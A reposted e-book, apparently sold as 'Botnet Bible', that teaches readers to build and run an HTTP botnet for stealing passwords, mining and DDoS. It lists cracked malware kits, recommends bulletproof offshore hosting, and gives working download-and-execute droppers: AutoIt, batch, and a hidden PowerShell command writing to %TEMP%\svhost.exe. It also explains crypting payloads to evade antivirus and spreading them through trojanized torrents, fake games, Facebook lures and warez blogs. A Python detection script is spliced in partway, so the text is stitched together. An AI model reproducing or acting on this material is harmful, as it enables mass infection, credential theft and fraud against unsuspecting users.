Guide to creating a botnet | Botnet Bible


BOTNET BIBLE
First of all, thank you for buying my e-book. Within this guide I will be
teaching you how to set up an HTTP botnet/controller. Everything is covered
step by step, but if you face any problem, don't hesitate to contact me.
Botnet types:
In this version of my ebook only HTTP controllers are covered. HTTP botnets
can be divided into two types:
– loaders
– stealers
Loaders are usually used to hold bots; they can only perform
download & execute, update and uninstall tasks.
Stealers are usually used to steal saved passwords from popular browsers,
email clients and FTP clients, chat logs from Skype/Jabber, etc. A good stealer
should have a keylogger.
WARNING!!!
Always run cracked builder using
virtual machine.
Free botnets you may use:
Botnet files i have included with this ebook:
– Betabot 1.8.0.11 – its a multi task and native bot, its old and cracked
builder so not all function are working. But this is still one of the best
choice to hold good amount of bots. This botnet has strong botkiller,
AV killer, persistence, few ddos methods, hosts file editor and much
more.
– Novobot – its just a loader coded in c++, hidden from task manager.
Cracked builder.
– Gaudox 1.0.0.1 – another free loader, released for free by excr4sh.
With good crypter its one of the best choices if you need to hold
good amount of bots.
– Loki 1.6 – its old version of popular stealer. Cracked builder 1.6
– OmegaNet – its simple multi-task botnet, based on litehttp(opensource).

– Diamondfox 4.2.0.650 Multi task botnet, builder is in virtual
machine.
Paid botnets you may use:
– smoke botnet
https://ift.tt/2vJRU4u
– quant loader
https://ift.tt/2M4ckAb
– Miner Bot
https://ift.tt/2vOwoLW
– Azourult |stealer
https://ift.tt/2M4bIdR
– Godzilla loader
https://ift.tt/2vOwpiY
– neutrino botnet
https://ift.tt/2M4cmbh
– formbook
https://ift.tt/2vOwrr6
Offshore servers and bulletproof domains:
Choosing the right hosting provider and domain registrar may save you a
lot of troubles in future. For small botnets (500-5000 bots) you may only
need to buy Virtual Private Server located in one of those countries:
– Panama
– Costa Rica
– Berize
– Guatemala
– Russia
few examples:
– panamaserver.com
– offshoreracks.com
– ccihosting.com
and russian or chaina registrar, few examples:
– r01.ru
– nic.ru
– tonic.tu
– openleaf.net.ru
Depends on your actions(how you spread your executable file, how you
use your botnet(ddosing, minning, herding bots, CPA,CEO, etc.) your
server or domain may be listed on spamhaus, it means your
domain/server/customer account may be suspended permanently. In this
case, when you create your botnet u use at least two back up domains, so if
your main domain will be suspended, your bots will connect to back up
domain. If your server get suspended you just need to reinstall your panel
on another server. From my experience some providers ignore first abuse
but if spamhaus will keep sending reports, you will get suspended. If u
want to avoid this problem, usually you need to buy good dedicated server
in offshore location, but its much expensive, also you may buy fast flux
system, its a proxy system, it hide your real server IP. You can only buy
Virtual Private Server, preferably Centos OS 6 or 7 and domains.
Setting up Virtual Private Server:
Once you purchase server you should get SSH, FTP, control panel details.
SSH access is used to control your OS and perform all commands, FTP is
used to transfer files between you and your VPS. Control panel is used to
reboot, reinstall server, statistics (i.e.bandwidth).
Download putty
https://ift.tt/2raJJxP
and login to SSH.
Centos 6:
1. First of all update your server and install wget and vim. Sometimes you may be
asked few times for confirmation, just press Y and ENTER:
Code:
sudo yum update
sudo yum install wget
sudo yum install vim
2. Install apache and run it:
Code:
sudo yum install httpd
sudo service httpd start
3. Install PHP. Sometimes newest version of PHP is required, in that case we will install
php and upgrade it using REMI and EPEL repositories:
– Install PHP:
Code:
sudo yum install php
– Install the Remi and EPEL RPM repositories:
Code:
wget https://ift.tt/1JkCDJ2
&& rpm -Uvh epel-release-latest-6.noarch.rpm
wget https://ift.tt/1fY6w3I && rpm -Uvh
remi-release-6*.rpm
– You need to enable the REMI repository globally. I will use VIM – free text editor. Quick
guide: if you press INSERT you will be able to edit document and if you press ESC you will
be in command mode. Type the following command:
Code:
vim /etc/yum.repos.d/remi.repo
Press INSTERT and under the section [remi] and [remi-php56] change the following line
from 0 to 1: enabled=0
Now press ESC and type the following command:
Code:
:wq
Now you can upgrade your php:
Code:
sudo yum -y upgrade php*
4. Install MYSQL server. We will use official REMI repositories.
Install and activate the REMI and EPEL RPM Repositories
If you have not done so already, install and activate the REMI and EPEL repositories;
Code:
wget https://ift.tt/1JkCDJ2 && rpm
-Uvh epel-release-latest-6.noarch.rpm
wget https://ift.tt/1fY6w3I && rpm -Uvh remirelease-6*.rpm
Install and activate mysql server:
Code:
sudo yum install mysql mysql-server
– now run mysql:
Code:
sudo service mysqld start
– using this commands you can upgrade and check what version of mysql you use:
Code:
yum -y update mysql*
rpm -qa | grep mysql
5. Install additional libraries. Few botnets require addidtional php libraries. For example
Zyklon HTTP require php-gd library for captcha. We will install few standard libraries:
Code:
sudo yum install php-mysql php-pdo php-common php-cli php-gd
6. Now we need to install Ioncube Loader. Download it
from https://ift.tt/1AfKGmD I use centos 6 64bit so i choosed linux 64 bit.
You can see a lot of files in archive, which Ioncube loader is the right one ? Depends on
your PHP version. Type the following command:
Code:
php -v
In that case i have installed PHP 5.6 so i copy the following file: ioncube_loader_lin_5.6 to
my server. You need to copy it to: /usr/lib64/php/modules/ioncube_loader_lin_5.6.so
Do it in ftp client if u want. Now you need to edit php.ini file. Its located in /etc/php.ini We
will use vim again:
Code:
vim /etc/php.ini
Press INSERT and add the following line at the top of the file. This is just path to Ioncube
loader. Version of Ioncube loader must match with PHP version.
Code:
zend_extension = /usr/lib64/php/modules/ioncube_loader_lin_5.6.so
Now restart apache&mysql and check if its installed correctly:
Code:
service httpd restart
service mysqld restart
php -v
7. Dealing with mysql:
– Run mysql installation script:
Code:
mysql_secure_installation
You will be able to setup new root password to your mysql. To other questions just answer
yes.
– Now log in to mysql:
Code:
mysql -u root -p
– Create new database:
Code:
create database NameOfYourDatabase;
– Create new user with privileges and refresh it:
Code:
CREATE USER ‘NameOfYourUser’@’localhost’ IDENTIFIED BY ‘PasswordForYourUser’;
GRANT ALL PRIVILEGES ON NameOfYourDatabase . * TO ‘NameOfYourUser’@’localhost’;
FLUSH PRIVILEGES;
Centos 7:
Installing MySQL / MariaDB
MariaDB is a MySQL fork of the original MySQL developer Monty Widenius. MariaDB is compatible with
MySQL and I’ve chosen to use MariaDB here instead of MySQL. To install MySQL, we do install MariaDB
like this:
yum -y install mariadb-server mariadb
Then we create the system startup links for MySQL (so that MySQL starts automatically whenever the
system boots) and start the MySQL server:
systemctl start mariadb.service
systemctl enable mariadb.service
Set passwords for the MySQL root account:
mysql_secure_installation
Just press enter and you will be able to setup new mysql root password.
3 Installing Apache2
CentOS 7 ships with apache 2.4. Apache2 is directly available as a CentOS 7.0 package, therefore we
can install it like this:
yum -y install httpd
By default apache will be installed, if-not then please install it as shown above
Now configure your system to start Apache at boot time…
systemctl start httpd.service
systemctl enable httpd.service
In CentOS 7.0 uses Firewall-cmd, so I will customize it to allow external access to port 80 (http)
and 443 (https).
firewall-cmd –permanent –zone=public –add-service=http
firewall-cmd –permanent –zone=public –add-service=https
firewall-cmd –reload
Now direct your browser to http://192.168.0.100, and you should see the Apache2 placeholder
page.
4 Installing PHP5
We can install PHP5 and the Apache PHP5 module as follows:
yum -y install php
We must restart Apache afterwards:
systemctl restart httpd.service
5 Testing PHP5 / Getting Details About Your PHP5
Installation
The document root of the default website is /var/www/html. We will now create a small PHP file
(info.php) in that directory and call it in a browser. The file will display lots of useful details about our
PHP installation, such as the installed PHP version.
vi /var/www/html/info.php
<?php
phpinfo();
?>
Now we call that file in a browser (e.g. https://ift.tt/2M4cnMn
As you see, PHP5 is working, and it’s working through the Apache 2.0 Handler, as shown in
the Server API line. If you scroll further down, you will see all modules that are already enabled in
PHP5. MySQL is not listed there which means we don’t have MySQL support in PHP5 yet.
6 Getting MySQL Support In PHP5
To get MySQL support in PHP, we can install the php-mysql package. It’s a good idea to install some
other PHP5 modules as well as you might need them for your applications. You can search for available
PHP5 modules like this:
yum search php
Pick the ones you need and install them like this:
yum -y install php-mysql
In the next step I will install some common PHP modules that are required by CMS Systems like
Wordpress, Joomla and Drupal:
yum -y install php-gd php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring phpsnmp
php-soap curl curl-devel
Now restart Apache2:
systemctl restart httpd.service
Now reload https://ift.tt/1MtimzL in your browser and scroll down to the modules
section again. You should now find lots of new modules like curl etc there.:
Setting up domains:
Depends which server/domain you bought, you have two options:
– add A record(contains your VPS IP) to your domain if you
purchased DNS hosting within your domain
– add nameservers to your domain if you purchased DNS zone with
your server
For example if you choosed panamaserver and nic.ru domain you can just
add nameservers to your domain, because panamaserver provides you your
name servers: ns1.panamaserver.co and ns2.panamaserver.co
If u dont have nameservers you need to use A record.
Adding nameservers in nic.ru:
Adding your domain in panamserver DNS zone:
Dealing with botnet panel:
– Copy panel files to /var/www/html/YourDirectory/
– Go to yourdomain.xx/YourDirectory/setup.php or similar name.
You may use your server ip instead of domain name. Fill all fields,
similar to this:
Code:
sql host: localhost or 127.0.0.1
sql user: NameOfYourUser
database name: NameOfYourDatabase
panel admin login: YourLoginToPanel
panel admin pass: YourPassToPanel
connection key: Usually you can generate it in your builder
Crypting and dealing with builder/executable file:
– If you already got your executable file(you bought panel files
and executable file) you may miss this step. Usually in domains/ips
tab you add your domains/ips and in path you add
path(YourDirectory) to your gate. You should have example in
builder how to fill all fields correctly. If u face any problem, let me
know.
Now you need to crypt your file, if u have never used crypter you
should read this thread:
https://ift.tt/2M4coQr
Its good explanation how crypters works.
Spreading methods:
1.Geo-targeted Torrents Spreading: This method is known
everywhere, but i guess you never heard about how to target
specific countries. Go to https://ift.tt/2vJRZVQ and click
register(1*).
You should use chrome browser and autotranslate. This site is only
message board about p2p newtorks. Go to Open registration
thread(2*). You can find here public and private trackers from the
entire world. You will get the best results if you choose site in your
arterial language but you can still use chrome auto-translate.
You can find much more than this:
http://1337x.to
http://limetorrents.cc
https://ift.tt/1dhcM4R https://ift.tt/2oCUaWO
https://ift.tt/23ara4Z
https://ift.tt/1IMtmuP https://ift.tt/1fbnrmc
Important:
– 5-15 USD Buy Seedbox/Shell/RDP, you will be able to seed your
torrents 24/7. Windows RDP with 100-500gb will be enough for
you.
– 5-15 USD I suggest you to buy invite to private tracker. You
will have access to legitimate software. Im usually using
http://iptorrents.com. You can always find your software
somewhere else.
Now you have to find popular windows application and bind it with
your server. I will show you few methods how to do this. First you
have to use crypter to make it FUD. You will get the best results if
you buy private stub and if its runtime fud. Before you buy crypter i
suggest you to read The Crypter Bible by KillaMuvz
Binding:
– – You may use Ultimate Spreading Tool – Usually you can use
binder in your crypter but you have to make sure that you have
option „run once”. – I suggest you to use Exe to bat converter if
you are binding two executable files. Open notepad and type:
@echo off start server.exe TIMEOUT /T 10 start legit.exe
Save it as start.bat and add it in converter. In options choose
invisible application and/or current/temporary directory.
Include server.exe – your server and legit.exe – your program.
Compile your file and make new torrent in your RDP. Usually you
have to add trackers(3*) to it but its not necessary. You may just
google public trackers list 2016. First you should upload few legit
torrents movies/music or other. Dont upload duplicates and read
rules. If you will be banned just make new account.
Important:
– Use scantime FUD downloader instead of your encrypted
server. People will always download your fresh file. – You can use
Ultimate Spreading Tool or Neos Downloader or any other free
downloader. – You can make your downloader using AutoIT.
Download AutoIT here Create new AutoIT Script:
$downloadlink = “[DirectLinkToYourFile]”
$downloadhere = @Appdatadir & “\YourFile.exe”
Inetget($downloadlink, $downloadhere, 1,1)
Sleep(500)
shellexecute($downloadhere) examples: $downloadlink =
“[http://directlink.se/server.exe]” $downloadhere = @Appdatadir &
“\server.exe”
Now you can run converter and convert it to .exe
– – You can create .ink downloader. Right click in
destkop/create/shortcut and copy this code: powershell
-windowstyle hidden (new-object
System.Net.WebClient).DownloadFile(‘https://ift.tt/2vJS4ZE
ham/putty/latest/x86/putty.exe’,’%TEMP%\svhost.exe’);
StartProcess “%TEMP%\svhost.exe” Replace link to putty.exe with
your file. Warning: You cant bind .ink with other files. Investment –
You can always buy FUD downloader to get the best results while
spreading.
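Seen from the defender's side, the downloader patterns described in this section (a hidden-window PowerShell `DownloadFile` into `%TEMP%`, a payload named `svhost.exe`, a batch wrapper starting an executable from a temporary directory) leave recognizable process-creation telemetry. The following detection sketch is an added example, not part of the original e-book; the event fields, sample events and rule names are constructed for illustration.

```python
import ntpath
import re

# Names malware commonly imitates; extend from your own baseline (assumption).
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "explorer.exe"}
USER_WRITABLE = re.compile(
    r"%temp%|%appdata%|\\appdata\\(local\\temp|roaming)\\|\\windows\\temp\\", re.I)
HIDDEN_PS = re.compile(r"powershell(\.exe)?\b.*-w\w*\s+(hidden|1)\b", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
TEMP = r"C:\Users\alice\AppData\Local\Temp" + "\\"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell -windowstyle hidden (new-object System.Net.WebClient)"
            r".DownloadFile('http://files.example.invalid/t.exe','%TEMP%\svhost.exe')"},
    {"parent": PS, "image": TEMP + "svhost.exe", "cmd": TEMP + "svhost.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": TEMP + "server.exe", "cmd": "server.exe"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell -File C:\scripts\backup.ps1"},
]


def one_edit_apart(a, b):
    """True when a and b differ by exactly one insertion, deletion or substitution."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a  # a is now the shorter (or equal-length) string
    i = 0
    while i < len(a) and a[i] == b[i]:
        i += 1
    # Skip one character in b (insertion) or in both (substitution); the rest must match.
    return a[i + (len(a) == len(b)):] == b[i + 1:]


def detect(event):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    cmd, image = event["cmd"], event["image"]
    name = ntpath.basename(image).lower()
    if HIDDEN_PS.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("hidden_powershell_download")
    if USER_WRITABLE.search(image) and name.endswith(".exe"):
        hits.append("exe_in_user_writable_dir")
    if any(one_edit_apart(name, s) for s in SYSTEM_NAMES):
        hits.append("system_name_lookalike")
    elif name in SYSTEM_NAMES and not image.lower().startswith("c:\\windows\\"):
        hits.append("system_name_wrong_path")
    if ntpath.basename(event["parent"]).lower() == "cmd.exe" and USER_WRITABLE.search(image):
        hits.append("script_spawned_temp_exe")
    return hits


def scan(events):
    """Map event index to fired rules, omitting events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := detect(e))}


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS).items():
        print(index, rules)
```

Single rules such as `exe_in_user_writable_dir` are noisy on their own (installers and updaters also run from temporary directories); alert on combinations per host and tune against your own baseline.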
2. Spreading to gamers: This method do not require investment
and you will need only 15 minutes to setup everything. You just
need to register in one of those sites and pretend to be a young
game developer: http://itch.io/ http://www.indiedb.com/
http://gamejolt.com/ Make account and make your profile looks
more legit, add picture,description,something about you. Choose a
development status when you adding new game. Remember, the
better it looks, the more downloads you will get. Pump yoour file to
about 20-50 MB or add to archive some random DLL files, your
server/downloader and upload it. You shuould use „fake error”
option in your crypter. Then you can advertise your game in chat or
other places. Dont upload duplicates and read rules. If you will be
banned just make new account. You should find other inchie games
sites and repeat process. With this method you can easly get
hundred clients per day.
3. Facebook spreading.
STEP 1 make your file FUD and change the icon to a fidget spinner
or make it look like a form, next upload it to directlink.cz and or
safe.moe or anywhere you may choose.
STEP 2 The spreading, I mainly use Facebook for this but you can
use other socialmedia sites and or forums, but I have had the most
success using facebook you need to make a fake account that
promotes fidget spinners and upload and share the photo I
provided with a description like this:
“To win a free fidget spinner just click the link down bellow
download our form and you will soon receive a free sample fidget
spinner”
you can make this a bit more elaborate to make it more convincing
or if you already have access to FB accounts that you have
achieved from slaves you already have just log in and post this
same message and tag all the users friends and family members,
but most people will fall for it regardless and I know what you may
be thinking this method is ridiculous I was just as suprized as you
were once I tried it I had several hundred downloads after I
uploaded it to several facebook accounts item popularity is key
people see something booming on the net so they wan’t it, this
method is most effective on facebook accounts that already have
allot of real friends or family members, but the fake account
method works aswell you just need to share the photo and the link
with the description I provided on as many toy FB pages or popular
pages as possible and the results will begin to show. anyway this
method is coming to an end now, I hope you gain as much success
as I did with it and I hope you enjoy it, you can put your own twist
on it aswell and maybe incorporate different items, such as other
fidget toys or niches but regardless thanks for buying and good
luck!
4. Warez spreading
This is really old but still working method. So why did you pay this
tutorial? Because I’ll not just tell you some ideas. I’ll show you how
to do it with actual tools. I’m using this method for my silent miners
and so far 15-20 new downloads every day with autopilot. I’ve
spend only $11 dollar for this setup and every day 15-20 new install
is good numbers for me. Lets begin the tutorial. First of all we will
basically open a warez download blog. At least people will think
that way. You need to buy your hosting and domain anonymously
because of you will share some illegal things on this site and we
don’t want to leave any trace behind us.
For anonymous purchase and good service I choosed Namecheap
for this method. I paid $11 for SSL + Hosting + Whois Protection +
.store domain This will be total amount of our investment. Don’t
forget to pay with bitcoin. We are choosing Namecheap because
they let us paying with bitcoins. And complete the forms with fake
information ofcourse. After we setup our site we won’t even login
again so do everything carefully 🙂 Ok we bought our hosting and
domain and we are ready to go. Login your cpanel and setup your
wordpress automatically. Find a good, seo friendly and lightweight
theme for your wp and install it. Go to Plugins and click the add
new. Search for wp-o-matic This tool is a lifesaver. Install and
activate it. Wp-o-matic is a content robot. It’s fetching contents
from the rss feeds periodically. Yes this content is not original, yes it
is bad for seo but we are not aiming high ranks on the google
either. C/P content will do don’t worry. Go to Wp-o-matic and click
add new campaign.
This section is customizable but you should follow and copy my
settings. Add New Campaign You can give a name for your
campaign like KeyGens. We can collect all keygen rss’s under this
campaign. Widget After Content I’ll get this later. No need to touch
it. Campaign Description You can leave blank this section. Feeds For
This Campaign This is an important part. You should go to google
and find some quality warez blogs. I checked google and find one
and it has rss feeds too 🙂 https://ift.tt/2M4bRxV Click the add
feed button and paste your feed url. Then click the Check all feeds
button. If this feed is suitable it turns green. If it is not suitable it
will shown red. Delete the red ones and add the new rss’es. 4 5
quality rss feed will do. It means at least 4 5 new post to your site.
Publish You don’t need to change anything in here. And we are not
ready to publish either. Wait for other settings. Campaign Post
Formats This section is irrelevant too. No need to change anything
here.
Options for this campaign If you are not know what are you doing
just copy my settings in here. We are getting contents and
removing original download links from it here. We will add our
download links later. Schedule Cron You will schedule your
campaign so everyday at 3 o’clock your bot will add new contents.
Campaign Categories You can check add auto categories and you
don’t need to do it manually later. Don’t change anything more at
your page.
Click publish and wait. When the Run Now button available click it.
And wait your bot is fetching new contents. Now you have a warez
blog which is creating automatic content everyday. Congratz. You
can add your advertisement codes and start earning little from it.
But stop we are not after advertisement earnings. Lets move on.
Now go to plugin page again and click add new. Search for Widget
After Content. Install it then activate it. This plugin creates custom
contents automatically after every one of your posts. We will add
our download links with this plugin
Did you see, there is a after content block. Drop down there a text
widget and open it
Add your download links and click save. You will put your own stubs
download links don’t forget. And you can rename your mallware like
Ultimate Downloader, Sourceforge Downloader and you are ready
to go. You have an auto-pilot slave factory congratz.
This is my one week download numbers. Isn’t it bad huh?



from Trương Định https://ift.tt/2vOwEuo